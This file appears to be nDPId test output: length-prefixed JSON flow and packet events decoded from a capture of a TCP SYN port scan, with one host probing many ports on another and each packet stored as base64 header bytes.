+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAscmYAACoGrAysEAAIQA2GNIzSBFbdUoMYAAAAAGACDAAoOQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsltUAADUGfJ2sEAAIQA2GNIzSF3XdUoMYAAAAAGACCAAZGgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAskLgAADgGf7qsEAAIQA2GNIzSB\/LdUoMYAAAAAGACBAAsnQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsULwAADcGwLasEAAIQA2GNIzSFJXdUoMYAAAAAGACEAAT+gAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsuIAAACYGafKsEAAIQA2GNIzSF0rdUoMYAAAAAGACDAAVRQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsa\/cAACkGs3usEAAIQA2GNIzSDMTdUoMYAAAAAGACCAAjywAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsYnoAACkGvPisEAAIQA2GNIzSBBTdUoMYAAAAAGACCAAsewAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAs0v0AADYGP3WsEAAIQA2GNIzSAgDdUoMYAAAAAGACDAAqjwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsecQAADIGnK6sEAAIQA2GNIzSwAXdUoMYAAAAAGACDABsiQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAss3cAADAGZPusEAAIQA2GNIzSDL3dUoMYAAAAAGACBAAn0gAAAgQFtA=="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1278275061338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275061338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAAWjNIpZyOl3VKDGWASFtDU2wAAAgQFZAAA"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsgRIAACoGnWCsEAAIQA2GNIzTGgrdU4MZAAAAAGACDAASggAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsvUQAACYGZS6sEAAIQA2GNIzTATfdU4MZAAAAAGACDAArVQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsHykAADQG9UmsEAAIQA2GNIzTCqXdU4MZAAAAAGACBAAp5wAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsL60AACgG8MWsEAAIQA2GNIzTH5TdU4MZAAAAAGACBAAU+AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsXrcAACYGw7usEAAIQA2GNIzTAFrdU4MZAAAAAGACDAAsMgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/GMAAC4GHg+sEAAIQA2GNIzTAjPdU4MZAAAAAGACDAAqWQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAs3yEAADoGL1GsEAAIQA2GNIzTJpXdU4MZAAAAAGACDAAF9wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAssu0AACkGbIWsEAAIQA2GNIzTB8DdU4MZAAAAAGACCAAozAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsiNYAADQGi5ysEAAIQA2GNIzTALPdU4MZAAAAAGACBAAz2QAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpYAACUG+NysEAAIQA2GNIzTH53dU4MZAAAAAGACCAAQ7wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsn1UAACYGgx2sEAAIQA2GNIzTFubdU4MZAAAAAGACDAAVpgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsUnoAAC4Gx\/isEAAIQA2GNIzTB\/HdU4MZAAAAAGACDAAkmwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsOmgAADcG1wqsEAAIQA2GNIzTKAPdU4MZAAAAAGACEAAAiQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsnegAACYGhIqsEAAIQA2GNIzTAQPdU4MZAAAAAGACDAAriQAAAgQFtA=="} 